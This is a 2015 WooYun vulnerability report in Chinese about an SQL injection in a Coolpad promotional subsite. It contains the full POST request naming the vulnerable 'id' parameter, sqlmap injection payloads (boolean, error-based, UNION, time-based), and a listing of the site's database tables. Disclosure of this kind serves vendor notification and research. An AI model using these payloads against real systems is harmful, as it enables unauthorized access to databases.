当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116069

漏洞标题:酷派又一业务存在sql注入

相关厂商:yulong.com

漏洞作者: 路人甲

提交时间:2015-05-25 14:23

修复时间:2015-07-12 10:16

公开时间:2015-07-12 10:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-25: 细节已通知厂商并且等待厂商处理中
2015-05-28: 厂商已经确认,细节仅向厂商公开
2015-06-07: 细节向核心白帽子及相关领域专家公开
2015-06-17: 细节向普通白帽子公开
2015-06-27: 细节向实习白帽子公开
2015-07-12: 细节向公众公开

简要描述:

12

详细说明:

12

漏洞证明:


http://5950.coolpad.cn/ 分站地址
post数据:

POST /interface.php?c=users51&m=clickFiveAddOne HTTP/1.0
Host: 5950.coolpad.cn
Proxy-Connection: keep-alive
Content-Length: 5
Origin: http://5950.coolpad.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
content-type: application/x-www-form-urlencoded
Accept: */*
Referer: http://5950.coolpad.cn/swf2/coolpadindex.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: __utmaxx233=238988767.846963834.1432533975.1432533975.1432533975.1; __utmcxx233=238988767; __utmz=238988767.1432533975.1.1.utmccn=(referral)|utmcsr=mcsdl.yulong.com|utmcct=/index/index.html|utmcmd=referral; __scnt=1; PHPSESSID=2ph1sbc53npacfss50s5ackli4; __utmbxx233=238988767; _jzqa=1.3850769915902337500.1432534282.1432534282.1432534282.1; _jzqc=1; _jzqx=1.1432534282.1432534282.1.jzqsr=5950%2Ecoolpad%2Ecn|jzqct=/swf2/coolpadindex%2Eswf.-; _jzqckmp=1; _jzqb=1.1.10.1432534282.0
id=11
注入参数:
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=11 AND 6429=6429
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=11 AND (SELECT 7365 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SE
LECT (CASE WHEN (7365=7365) THEN 1 ELSE 0 END)),0x716a707a71,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: id=-6987 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT
(0x71706b6a71,0x6871696c4f68754a6644,0x716a707a71),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=11 AND SLEEP(5)
---
[14:16:38] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.15
back-end DBMS: MySQL 5.0
[14:16:38] [INFO] testing if current user is DBA
[14:16:38] [INFO] fetching current user


360截图20150525141805161.jpg


跑个表:

Database: 5950coolpad
[13 tables]
+----------------------+
| add_click_good_count |
| add_user_count |
| click_find_king |
| click_five_add_one |
| click_good |
| click_good_one |
| find_king |
| five_add_one |
| five_add_one_code |
| game |
| game_result |
| login_log |
| sendinfo_log |
+----------------------+


360截图20150525141837262.jpg


修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-05-28 10:15

厂商回复:

最新状态:

暂无


漏洞评价:

评论